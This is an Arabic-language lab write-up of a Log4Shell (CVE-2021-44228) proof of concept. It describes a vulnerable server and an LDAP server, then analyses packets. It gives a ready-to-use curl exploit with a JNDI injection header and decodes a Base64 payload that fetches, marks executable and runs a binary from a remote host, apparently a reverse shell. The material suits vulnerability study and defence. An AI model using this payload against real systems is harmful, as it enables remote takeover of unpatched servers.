
إثبات مفهوم لـ Log4Shell (CVE-2021-44228) يوضح تنفيذ التعليمات البرمجية عن بُعد عبر حقن JNDI، بما في ذلك إعداد الخادم الضعيف، وأمر الاستغلال، وتحليل الحزم.
Log4Shell — المعروف أيضًا باسم CVE-2021-44228 — هو ثغرة أمنية حرجة تتيح تنفيذ الأوامر عن بُعد في الأنظمة التي تستخدم مكتبة Log4j من مؤسسة Apache، وهي مكتبة جافا مفتوحة المصدر تُستخدم على نطاق واسع في المنتجات التجارية ومفتوحة المصدر.

تحليل POC
الخادم الضعيف يعمل على المنفذ 8080

وخادم LDAP يعمل على منفذين: HTTP 8888 و LDAP 1389

أمر الاستغلال
curl 172.17.0.2:8080 -H 'X-Api-Version: ${jndi:ldap://172.17.0.1:1389/Basic/Command/Base64/d2dldCBodHRwczovLzEwLjAuMi4xNTo4MDAwL3JldiAtTyAvdG1wL3JldiAmJiBjaG1vZCAreCAvdG1wL3JldiAmJiAvdG1wL3Jldg==}'
{
172.17.0.2:8080 -- عنوان IP الخادم الضعيف
172.17.0.1:1389 -- عنوان IP خادم LDAP
Base64 -- d2dldCBodHRwczovLzEwLjAuMi4xNTo4MDAwL3JldiAtTyAvdG1wL3JldiAmJiBjaG1vZCAreCAvdG1wL3JldiAmJiAvdG1wL3Jldg==
الأمر المُفكّك - wget https://10.0.2.15:8000/rev -O /tmp/rev && chmod +x /tmp/rev && /tmp/rev
}
تحليل الحزم


كما نرى في الحزم، الخادم يرسل طلب GET للحصول على كلاس إلى خادم LDAP. إذا فحصنا كلاس الاستغلال، نجد أن خادم LDAP يرسل الأمر المُفكّك داخل كلاس الاستغلال.

المراجع